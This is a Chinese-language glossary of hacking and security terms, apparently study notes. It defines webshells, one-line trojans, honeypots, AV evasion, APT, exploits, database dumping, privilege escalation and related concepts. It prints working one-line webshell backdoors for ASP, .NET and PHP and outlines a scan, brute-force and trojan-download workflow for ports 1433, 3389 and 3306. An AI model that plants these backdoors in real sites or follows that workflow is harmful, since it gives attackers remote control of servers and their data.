安全术语

 肉鸡、抓鸡

抓鸡
指通过扫描弱口令，爆破，漏洞自动化种马 达到控制机器

端口
1433 抓鸡 sqlserver
流程：网段扫描端口，进行爆破弱密码，下载木马
3389 抓鸡
3306 抓鸡

 

木马分类
计算机木马，
网页木马
大马，小马，一句话木马

webshell
以asp、php、jsp或者cgi 等网页文件形式存在的一种命令执行环境，也可以将其称为一种网页后门。黑客再入侵了一个网站后
，通常会将sap或者php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后
门，得到一个命令执行环境，以达到控制网站服务器的目的。

 

小马
小马体积小，可以上传大文件或者webshell

一句话木马
ASP : <%execute(request("MH"))%>
.NET : <%@Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
PHP : <?php eval($_POST[a]; ?>

 

如何使用一句话木马？
中国菜刀
是一款专业的网站管理软件，用途广泛，使用方便，小巧使用
只要支持动态脚本的网站，都可以用中国菜刀来进行管理！
程序大小： 214K
再肥简体中文环境下使用，自动切换到英文界面
UINCODE 方式编译，支持多国语言输入显示。

 

 

蜜罐 
蜜罐技术本质上是一种对攻击方进行欺骗的技术，通过布置一些作为诱饵的主机、网络服务或者信息，诱使攻击方对它们实施攻
击，从而可以对攻击行为进行捕获和分析，了解攻击方所使用的工具与方法，推测攻击意图和动机，能够让防御方清晰地了解他
们所面对的安全威胁，并通过技术和管理手段来增强实际系统的安全防护能力。

蜜罐好比是情报收集系统。蜜罐好像是故意让人攻击的目标，引诱黑客前来攻击。所以攻击者入侵后，你就可以知道他是如何得
逞的，随时了解针对服务器发动的最新的攻击和漏洞。还可以通过窃听黑客之间的联系，收集黑客所用的种种工具，并且掌握他
们的社交网络。

 

 

互联网由3层网络组成
表层网，深网，暗网

LAN -> 表层网 -> 深网 -> 暗网

暗网是深网的子集，没办法被搜索引擎访问到的。
需要跳转出互联网，再通过特殊的接口进入
一般都是以 .onion 为后缀

 

免杀
您有没有过心爱的工具被杀毒软件KILL的经历；
您有没有过辛辛苦苦整理出来的工具集被杀毒软件搞成面目全非而“义愤填膺”的时候；
您有没有过好不容易拿到权限，上传的木马却被杀的痛心时刻？
免杀，它能做的就是避免这些事情的发生！使杀毒软件成为摆设！
当然，除此之外免杀技术带给我们更多的，将是思想的飞跃与技术的成长。

 

 

APT 攻击
APT（Advanced Persistent Threat）是指高级持续性威胁。
利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式。

 

 

Exploit、POC
漏洞利用
经常看一网上有人求助某某某版本EXP。
Exploit 的英文意思就是利用，它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit（利用)，有Exploit就肯定有漏洞。

概念验证（英语：Proof of concept，简称POC）是对某些想法的一个较短而不完整的实现，以证明其可行性，示范其原理，其
目的是为了验证一些概念或理论。概念验证通常被认为是一个有里程碑意义的实现的原型 。

 

 

内网渗透

什么是内网渗透？
内网+渗透 换个环境做渗透

为什么要内网渗透？
主要是Windows 协议

 

社会工程学
在计算机科学中，社会工程学指的是通过与他人的合法地交流，来使其心理受到影响，做出某些动作或者是透露一些机密信息的
方式。这通常被认为是一种欺诈他人以收集信息、行骗和入侵计算机系统的行为。在英美普通法系中，这一行为一般是被认作侵
犯隐私权的。

社工库
一个数据库，可渗透拿到的数据，可以做搜索

 

谷歌黑客
谷歌黑客(Google hacking)是使用搜索引擎，比如谷歌来定位因特网上的安全隐患和易攻击点。
Web上一般有两种容易发现的易受攻击类型：
软件漏洞和错误配置。
虽然一些有经验的入侵者目标是瞄准了一些特殊的系统，同时尝试发现会让他们进入的漏洞，但是大部分的入侵者是从具体的软
件漏洞开始或者是从那些普通用户错误配置开始，在这些配置中，他们已经知道怎样侵入，并且初步的尝试发现或扫描有该种漏
洞的系统。
谷歌对于第一种攻击者来说用处很少，但是对于第二种攻击者则发挥了重要作用。

 

脱裤
脱裤的谐音是对应脱库。
脱库的意思是：
是指通过非法手段获取网站的数据库,会员的信息或者自己需要的信息。简单的说，就是把数据库下载下来。

 

提权
顾名思义拿到WebShell之后从普通用户提升为管理员权限。

 

0day攻击
0day攻击，一种对计算机软件的攻击方式
在计算机领域中，零日漏洞或零时差漏洞（英语：Zero-day exploit、 zero-day、0-day）
通常是指还没有补丁的安全漏洞，而零日攻击或零时差攻击（英语：Zero-day attack）则是指利用这种漏洞进行的攻击。
提供该漏洞细节或者利用程序的人通常是该漏洞的发现者。
零日漏洞的利用程序对网络安全具有巨大威胁，因此零日漏洞不但是黑客的最爱，掌握多少零日漏洞也成为评价黑客技术水平的
一个重要参数。

 

 

旁站、C段
旁站：目标站点所在服务器上其他网站，然后再想办法跨到真正目标站点目录中。

C段：网段中的任意一台机器，只要子网想同就有可能嗅探到帐号密码。